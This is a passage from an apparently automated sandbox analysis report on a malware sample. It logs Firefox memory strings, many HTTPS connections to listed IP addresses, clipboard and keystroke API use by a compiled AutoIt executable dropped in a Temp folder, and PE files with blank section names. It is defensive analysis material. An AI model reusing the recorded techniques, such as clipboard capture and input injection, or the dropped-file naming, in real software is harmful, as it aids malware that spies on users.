Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883417146.000001EBEFC51000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1686886393.000001EBEFC51000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1957095865.000001EBF915F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1688787367.000001EBEDD84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 51438 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51433 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51427 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 51444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51471
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 51435 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 51440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51362
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51427
Source: unknown	Network traffic detected: HTTP traffic on port 51442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51471 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51436 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51438
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51439
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51436
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51437
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51435
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51433
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51442
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51440
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51444
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51443 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51437 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443

Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.22:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.22:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.222.236.48:443 -> 192.168.2.7:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51438 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51439 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51436 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51437 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51444 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51443 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DCEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

21_2_00DCEAFF

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DCED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

21_2_00DCED6A

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

21_2_00DCEAFF

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DBAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

21_2_00DBAA57

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DE9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

21_2_00DE9576

System Summary

Binary is likely a compiled AutoIt script file

Source: 139d3265bb.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 139d3265bb.exe, 00000015.00000000.1486637966.0000000000E12000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0a4a43ac-8
Source: 139d3265bb.exe, 00000015.00000000.1486637966.0000000000E12000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_003e72b6-d
Source: 139d3265bb.exe.15.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9ae121f3-e
Source: 139d3265bb.exe.15.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e60083fb-9
Source: random[1].exe0.15.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dca7e9f7-f
Source: random[1].exe0.15.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_aabc962b-7

PE file contains section with special chars

Source: pud8g3zixE.exe	Static PE information: section name:
Source: pud8g3zixE.exe	Static PE information: section name: .idata
Source: pud8g3zixE.exe	Static PE information: section name:
Source: svoutse.exe.0.dr	Static PE information: section name:
Source: svoutse.exe.0.dr	Static PE information: section name: .idata
Source: svoutse.exe.0.dr	Static PE information: section name:
Source: random[1].exe.15.dr	Static PE information: section name:
Source: random[1].exe.15.dr	Static PE information: section name: .rsrc
Source: random[1].exe.15.dr	Static PE information: section name: .idata
Source: random[1].exe.15.dr	Static PE information: section name:
Source: 76251a0626.exe.15.dr	Static PE information: section name:
Source: 76251a0626.exe.15.dr	Static PE information: section name: .rsrc
Source: 76251a0626.exe.15.dr	Static PE information: section name: .idata
Source: 76251a0626.exe.15.dr	Static PE information: section name:
Source: 88b8632b35.exe.15.dr	Static PE information: section name:
Source: 88b8632b35.exe.15.dr	Static PE information: section name: .rsrc
Source: 88b8632b35.exe.15.dr	Static PE information: section name: .idata
Source: 88b8632b35.exe.15.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Process Stats: CPU usage > 49%

Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 39_2_000001E51AA094F7 NtQuerySystemInformation,		39_2_000001E51AA094F7
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 39_2_000001E51AA23472 NtQuerySystemInformation,		39_2_000001E51AA23472

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

